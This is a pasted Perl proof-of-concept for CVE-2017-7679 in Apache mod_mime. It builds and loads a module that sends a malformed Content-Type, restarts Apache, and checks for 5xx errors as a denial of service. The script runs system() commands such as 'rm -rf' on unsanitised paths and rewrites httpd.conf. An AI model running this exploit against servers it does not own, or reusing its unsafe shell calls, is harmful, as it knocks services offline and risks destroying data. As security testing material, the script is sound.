UY-Scuti

Untitled

Jun 2nd, 2019
  1. #!/usr/bin/perl
  2. # Michael Gottburg - https://github.com/gottburgm/
  3.  
  4. use 5.10.0;
  5.  
  6. use strict;
  7. use warnings;
  8.  
  9. no warnings 'experimental';
  10.  
  11. use LWP::UserAgent;
  12. use HTTP::Request;
  13. use HTTP::Cookies;
  14. use HTTP::Response;
  15.  
  16. # Global Variables
  17. my $apache_install = 0;
  18. my $url = 0;
  19. $url = $ARGV[0] or help();
  20. $apache_install = $ARGV[1] or help();
  21.  
  22. if(-d $apache_install) {
  23. # Display The Header
  24. header();
  25.  
  26. # Run The PoC
  27. exploit($apache_install, $url);
  28. } else {
  29. print "[!] Couldn't Read/Find : $apache_install\n";
  30. help();
  31. }
  32.  
  33. sub header {
  34. print "\n\n";
  35. my $title = "=================================[ CVE-2017-7679 ]=================================";
  36.  
  37. print qq{
  38. $title
  39.  
  40. Reporter : ChenQin and Hanno Böck
  41. Date : 2017-06-20
  42. CVE : CVE-2017-7679
  43.  
  44. Description :
  45.  
  46. In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, mod_mime
  47. can read one byte past the end of a buffer when sending a malicious
  48. Content-Type response header.
  49.  
  50.  
  51. };
  52. print "="x(length($title)) . "\n\n";
  53. }
  54.  
  55. sub help {
  56. print "\n";
  57. print qq {
  58. Usage : perl $0 <URL> <APACHE_INSTALL_PATH>
  59.  
  60. ---------------------------------------------------------
  61. [EXAMPLE] perl $0 http://localhost:1337/ /usr/local/apache2
  62.  
  63. Note: Apache Install Path Must Be Absolute.
  64.  
  65. };
  66. print "\n\n";
  67. exit;
  68. }
  69.  
  70. sub buildRequester {
  71. my ( $useragent, $timeout, $proxy ) = @_;
  72. $proxy = 0 if(!defined($proxy));
  73. my $browser = 0;
  74. my $cookie_jar = 0;
  75.  
  76. $cookie_jar = HTTP::Cookies->new(
  77. file => "/tmp/cookies.lwp",
  78. autosave => 1,
  79. );
  80.  
  81. $browser = LWP::UserAgent->new();
  82. $browser->protocols_allowed( [qw( http https ftp )] );
  83. $browser->requests_redirectable(['GET', 'POST', 'HEAD', 'OPTIONS']);
  84. $browser->cookie_jar( $cookie_jar);
  85.  
  86. ### Custom Options
  87. $browser->timeout($timeout);
  88. $browser->agent($useragent);
  89.  
  90. if($proxy) {
  91. $browser->proxy( [qw( http https ftp ftps )] => $proxy);
  92. }
  93.  
  94. return $browser;
  95. }
  96.  
  97. sub buildRequest {
  98. my ( $url, $method, $payload, $content_type) = @_;
  99. $content_type = 'application/x-www-form-urlencoded' if(!defined($content_type) || !$content_type);
  100. $payload = '' if(!defined($payload) || !$content_type);
  101. $method = uc($method);
  102. my $request = 0;
  103.  
  104. if($method eq "GET") {
  105. $request = new HTTP::Request $method, $url . '?' . $payload;
  106. } else {
  107. $request = new HTTP::Request $method, $url;
  108. $request->content($payload);
  109. }
  110. $request->content_type($content_type);
  111.  
  112. return $request;
  113. }
  114.  
  115. sub exploit {
  116. my ( $apache_install, $url ) = @_;
  117. my $browser = 0;
  118. my $useragent = '';
  119. my $request = 0;
  120. my $response = 0;
  121. my $proxy = 0;
  122. my $timeout = 30;
  123. my $name = "CVE_2017_7679";
  124.  
  125. ### Setting Up The Requester
  126. $browser = buildRequester($useragent, $timeout, $proxy);
  127.  
  128. $url .= "$name/";
  129.  
  130. buildModule($apache_install, $name);
  131.  
  132. print "[*] Sending GET Request On : $url\n";
  133. $request = buildRequest($url, "GET", "", 0);
  134. $response = $browser->request($request);
  135. print "\tResponse Code : " . $response->code . "\n\tResponse Content :\n\t" . $response->content ."\n\n";
  136. print "[*] Server Seems To Be Affected ... Confirming ...\n" if($response->code =~ /50[0-9]/);
  137.  
  138. print "[*] Sending Second Request To Check If The Denial Of Service Worked On : $url\n";
  139. $request = buildRequest($url, "GET", "", 0);
  140. $response = $browser->request($request);
  141. print "\tResponse Code : " . $response->code . "\n\n";
  142.  
  143. if($response->code =~ /50[0-9]/) {
  144. print "[+] Server Is Affected .\n";
  145. } else {
  146. print "[-] Server Is NOT Affected .\n";
  147. }
  148.  
  149. if(-f "$apache_install/conf/httpd.conf.backup") {
  150. print "[*] Recovering Apache Configuration File From Backup : $apache_install/conf/httpd.conf.backup\n";
  151. system("mv $apache_install/conf/httpd.conf.backup $apache_install/conf/httpd.conf");
  152. }
  153. }
  154.  
  155. sub buildModule {
  156. my ($apache_install, $name) = @_;
  157. my $module_name = "mod_$name";
  158. my $template_file = 'mod_template.tpl',
  159. my $config_file = "$module_name.conf";
  160. my $module_file = "$module_name.c";
  161. my $module_template_path = "src/$template_file";
  162. my $module_dir = "$apache_install/$name";
  163. my $public_dir = 0;
  164.  
  165. # malicious content type
  166. my $content_type = "text/htmla\\0 ";
  167.  
  168. my @config_content = ();
  169. my @module_content = ();
  170.  
  171. ### Build Apache Module
  172. if(-f "$apache_install/bin/apxs") {
  173. print "[+] APXS Found : $apache_install/bin/apxs\n";
  174. print "[*] Building Module $module_name From Template : $module_template_path\n";
  175.  
  176. my @content = read_file($module_template_path, 1);
  177. foreach my $line (@content) {
  178. if($line =~ /__NAME__/i) {
  179. $line =~ s/__NAME__/$name/gi;
  180. } elsif ($line =~ /__MODULE-NAME__/i) {
  181. $line =~ s/__MODULE-NAME__/$module_name/gi;
  182. } elsif ($line =~ /__CONTENT-TYPE__/i) {
  183. $line =~ s/__CONTENT-TYPE__/$content_type/gi;
  184. }
  185. push(@module_content, "$line\n");
  186. }
  187.  
  188. print "[*] Writting Module In : $module_dir\n";
  189. system("rm -rf $module_dir") if(-d $module_dir);
  190. system("cd $apache_install; $apache_install/bin/apxs -g -n $name");
  191.  
  192. if(-d $module_dir && -f "src/$config_file") {
  193. write_file("$module_dir/$module_file", @module_content);
  194. if(-d "$apache_install/htdocs") {
  195. $public_dir = "$apache_install/htdocs";
  196. } else {
  197. if(-d "$apache_install/html") {
  198. $public_dir = "$apache_install/html";
  199. } else {
  200. print "[-] Couldn't Locate Apache Public Directory ...\n";
  201. exit;
  202. }
  203. }
  204.  
  205. if(!-d "$public_dir/$name") {
  206. print "[*] Creating Web Directory For Handler : $public_dir/$name\n";
  207. system("mkdir -p $public_dir/$name");
  208.  
  209. }
  210. print "[*] Backuping Apache Configuration File : $apache_install/conf/httpd.conf => $apache_install/conf/httpd.conf.backup\n";
  211. system("cp $apache_install/conf/httpd.conf $apache_install/conf/httpd.conf.backup");
  212. @content = read_file("src/$config_file");
  213. foreach my $line (@content) {
  214. chomp $line;
  215. if($line =~ /__NAME__/i) {
  216. $line =~ s/__NAME__/$name/gi;
  217. }
  218. push(@config_content, "$line\n");
  219. }
  220. print "[*] Compiling Module ...\n";
  221. system("$apache_install/bin/apxs -i -a -c $module_dir/$module_file");
  222.  
  223. print "[*] Adding Module Configuration Into Apache Configuration : $apache_install/conf/httpd.conf\n";
  224. append_after("$apache_install/conf/httpd.conf", "LoadModule $name", @config_content);
  225. write_file("$module_dir/$config_file", @config_content);
  226. } else {
  227. print "[-] Couldn't Write : $module_dir\n";
  228. exit;
  229. }
  230. } else {
  231. print "[-] Error : APXS And/Or Module File Not Found .\n";
  232. exit;
  233. }
  234.  
  235. print "[*] Restarting Apache ...\n";
  236. system("$apache_install/bin/apachectl restart");
  237. }
  238.  
  239. sub append_after {
  240. my ( $file, $string, @append_lines ) = @_;
  241. my @content = read_file($file);
  242. my @new_content = ();
  243.  
  244. foreach my $line (@content) {
  245. chomp $line;
  246. if($line =~ /$string/i) {
  247. push(@new_content, "$line\n");
  248. foreach my $append_line (@append_lines) {
  249. push(@new_content, "$append_line\n");
  250. }
  251. } else {
  252. push(@new_content, "$line\n");
  253. }
  254. }
  255. write_file($file, @new_content);
  256. }
  257.  
  258. sub read_file {
  259. my ($file, $chomp) = @_;
  260. $chomp = 0 if(!defined($chomp));
  261.  
  262. my @final_content = ();
  263.  
  264. open FILE, $file or die print "[-] $file Couldn't Be Read .\n";
  265. my @content = <FILE>;
  266. close FILE;
  267.  
  268. if($chomp) {
  269. foreach my $line (@content) {
  270. chomp $line;
  271. push(@final_content, $line);
  272. }
  273. } else {
  274. @final_content = @content;
  275. }
  276.  
  277. return @final_content;
  278. }
  279.  
  280. sub write_file {
  281. my ( $file, @content ) = @_;
  282.  
  283. open FILE, ">", $file or die print "[-] $file Couldn't Be Open : " . $@ . "\n";
  284. foreach my $line (@content) {
  285. print FILE $line if($line);
  286. }
  287. close FILE;
  288. }